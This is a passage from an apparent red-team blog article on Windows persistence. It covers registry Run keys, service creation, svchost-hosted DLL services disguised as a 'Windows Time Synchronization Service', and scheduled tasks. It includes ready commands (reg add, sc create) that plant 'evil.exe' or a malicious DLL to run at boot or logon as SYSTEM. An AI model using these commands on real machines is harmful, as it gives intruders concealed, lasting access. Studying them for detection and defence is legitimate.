&lt;span class="kd"&gt;C&lt;/span&gt;:\Documents &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;Settings&lt;/span&gt;\Hunter\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;span class="kd"&gt;All&lt;/span&gt; &lt;span class="kd"&gt;users&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\Documents &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;Settings&lt;/span&gt;\All &lt;span class="kd"&gt;Users&lt;/span&gt;\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x02 Registry Keys
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; With or without elevation.&lt;br&gt;&lt;br&gt;
The extensive Windows registry and its relatively lax permission management provide numerous opportunities for manipulation. Among these, registry auto‑start entries are a frequently used persistence mechanism.&lt;br&gt;&lt;br&gt;
As the core database of Windows, the registry stores a wealth of critical system and user information. Windows provides two independent top-level registry hives: &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; (HKCU), which pertains to the current user, and &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; (HKLM), which corresponds to the physical machine and can be modified only by privileged accounts.&lt;br&gt;&lt;br&gt;
With the increasing awareness of security, most Windows machines compromised during red team engagements operate with reduced privileges. For example, elevating privileges on a phished PC is often unnecessary; even if an Administrator’s startup entry is written after elevation, the user will still log into their own account on the next session, rendering the persistence ineffective.&lt;br&gt;&lt;br&gt;
All relevant registry keys for Windows persistence are enumerated below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Load Key
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load

2. Userinit Key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
This key normally contains userinit.exe. It permits multiple programmes separated by commas, e.g. userinit.exe,evil.exe.

3. Explorer\Run Key
The Explorer\Run key exists under both HKCU and HKLM.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

4. RunServicesOnce Key
This key starts service programmes before user logon and prior to other programmes launched via registry keys. It exists under both HKCU and HKLM.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

5. RunServices Key
Programmes specified here run immediately after those from RunServicesOnce, but both execute before user logon.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

6. RunOnce\Setup Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup

7. RunOnce Key
Installation programmes typically use the RunOnce key to auto‑start. Its locations are:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
[Pre‑NT6] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
The HKLM RunOnce key runs immediately after user logon, before other Run keys; the HKCU RunOnce key runs after the operating system has processed other Run keys and the Startup folder.

8. Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Run is the most commonly employed auto‑start key. The HKCU Run key executes after the HKLM Run key, but both are processed before the Startup folder.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Command to write a registry key:&lt;br&gt;&lt;br&gt;
&lt;code&gt;reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe"&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  0x03 Services
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
Creating a service requires non‑reduced administrator rights; therefore, privilege escalation is a prerequisite for this persistence method. However, it offers higher stealth compared to registry keys (e.g. loading a DLL via svchost service groups can conceal the malicious process). Both CMD and PowerShell can add services with commands. Example:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This straightforward approach launches a service via cmd. A minor pitfall exists: a shellcode loader that blocks the main thread may cause the service to appear unresponsive during startup and fail. Hence, wrapping the payload in cmd is mandatory; the executable cannot be registered as the service binary directly. Upon successful start, the process runs with SYSTEM privileges before user logon. The obvious drawback is that the malicious process remains a distinct entity, reducing stealth, as illustrated below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" alt=" " width="796" height="211"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Another category of services is launched through svchost. Numerous Windows services are loaded by injecting into this host process (a Microsoft‑sanctioned DLL injection mechanism). Consequently, if the DLL itself evades detection, antivirus software will ignore this behaviour; moreover, as the malicious process is not standalone, stealth is enhanced.&lt;br&gt;&lt;br&gt;
However, loading a service via svchost cannot be accomplished with a single command. It requires crafting a service DLL and adding extra registry entries. Because 64‑bit systems have two registry views (32‑bit and 64‑bit) and two svchost binaries (System32 and SysWOW64), the commands differ slightly.&lt;br&gt;&lt;br&gt;
Commands for 32‑bit systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\System32\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Commands for registering a 32‑bit service on 64‑bit systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\Syswow64\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Commands for native 64‑bit services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\System32\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:64
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A significant caveat: the &lt;code&gt;reg add&lt;/code&gt; command overwrites existing registry values. Most values under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost&lt;/code&gt; are of type &lt;code&gt;REG_MULTI_SZ&lt;/code&gt; (multi‑string), each listing the services of one svchost group. Therefore, one must never write to an existing value, as it holds services essential for system boot; overwriting it would cause severe issues. (Hence, the commands above use "netsvr", a value name that does not exist by default.)&lt;/p&gt;

&lt;h2&gt;
  
  
  0x04 Scheduled Tasks
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges (a token not filtered by UAC), or standard user privileges.&lt;br&gt;&lt;br&gt;
Scheduled tasks constitute another excellent persistence vector. Unlike auto‑start registry keys and services, scheduled tasks offer greater diversity and flexibility in configuration, and their location is relatively concealed (manual inspection requires several additional clicks). For instance, during security service engagements, the notorious "DriverLife" cryptominer achieved persistence by creating multiple scheduled tasks that launched PowerShell scripts, with its stager embedded directly in the command line as a base64‑encoded argument. The argument field shown by Task Scheduler is quite narrow, so less experienced engineers can easily overlook the trailing content; when triaging, read the task's full command line rather than relying on that truncated field.&lt;/p&gt;

&lt;p&gt;Windows provides the &lt;code&gt;SCHTASKS&lt;/code&gt; command for managing scheduled tasks, with the following options:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/parameter &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;arguments&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="kd"&gt;Description&lt;/span&gt;:
    &lt;span class="kd"&gt;Enables&lt;/span&gt; &lt;span class="kd"&gt;an&lt;/span&gt; &lt;span class="kd"&gt;administrator&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;delete&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;query&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;change&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt;.

&lt;span class="kd"&gt;Parameter&lt;/span&gt; &lt;span class="kd"&gt;List&lt;/span&gt;:
    &lt;span class="na"&gt;/Create         &lt;/span&gt;&lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;new&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/Delete         &lt;/span&gt;&lt;span class="kd"&gt;Deletes&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.
    &lt;span class="na"&gt;/Query          &lt;/span&gt;&lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;.
    &lt;span class="na"&gt;/Change         &lt;/span&gt;&lt;span class="kd"&gt;Changes&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;properties&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/Run            &lt;/span&gt;&lt;span class="kd"&gt;Runs&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;demand&lt;/span&gt;.
    &lt;span class="na"&gt;/End            &lt;/span&gt;&lt;span class="kd"&gt;Stops&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;currently&lt;/span&gt; &lt;span class="kd"&gt;running&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/ShowSid        &lt;/span&gt;&lt;span class="kd"&gt;Shows&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;security&lt;/span&gt; &lt;span class="kd"&gt;identifier&lt;/span&gt; &lt;span class="kd"&gt;corresponding&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt;.
    /&lt;span class="o"&gt;?&lt;/span&gt;              &lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="nb"&gt;help&lt;/span&gt; &lt;span class="kd"&gt;message&lt;/span&gt;.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For persistence, the &lt;code&gt;Create&lt;/code&gt; parameter is most frequently used. Due to its numerous arguments, the full help text is reproduced below for reference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;SCHTASKS&lt;/span&gt; &lt;span class="na"&gt;/Create &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/S &lt;/span&gt;&lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/U &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/P &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]]]]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;username&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;]]&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;modifier&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/D &lt;/span&gt;&lt;span class="kd"&gt;day&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/M &lt;/span&gt;&lt;span class="kd"&gt;months&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/I &lt;/span&gt;&lt;span class="kd"&gt;idletime&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="na"&gt;/TN &lt;/span&gt;&lt;span class="kd"&gt;taskname&lt;/span&gt; &lt;span class="na"&gt;/TR &lt;/span&gt;&lt;span class="kd"&gt;taskrun&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/ST &lt;/span&gt;&lt;span class="kd"&gt;starttime&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/RI &lt;/span&gt;&lt;span class="kd"&gt;interval&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;endtime&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="na"&gt;/DU &lt;/span&gt;&lt;span class="kd"&gt;duration&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/K&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/XML &lt;/span&gt;&lt;span class="kd"&gt;xmlfile&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;]]&lt;/span&gt;
    &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/SD &lt;/span&gt;&lt;span class="kd"&gt;startdate&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/ED &lt;/span&gt;&lt;span class="kd"&gt;enddate&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/IT &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="na"&gt;/NP&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/Z&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="na"&gt;/F&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="kd"&gt;Description&lt;/span&gt;:
     &lt;span class="kd"&gt;Allows&lt;/span&gt; &lt;span class="kd"&gt;an&lt;/span&gt; &lt;span class="kd"&gt;administrator&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt;.

&lt;span class="kd"&gt;Parameter&lt;/span&gt; &lt;span class="kd"&gt;List&lt;/span&gt;:
    &lt;span class="na"&gt;/S   &lt;/span&gt;&lt;span class="kd"&gt;system&lt;/span&gt;        &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;remote&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;connect&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt;. &lt;span class="kd"&gt;If&lt;/span&gt; &lt;span class="kd"&gt;omitted&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;system&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;used&lt;/span&gt;.
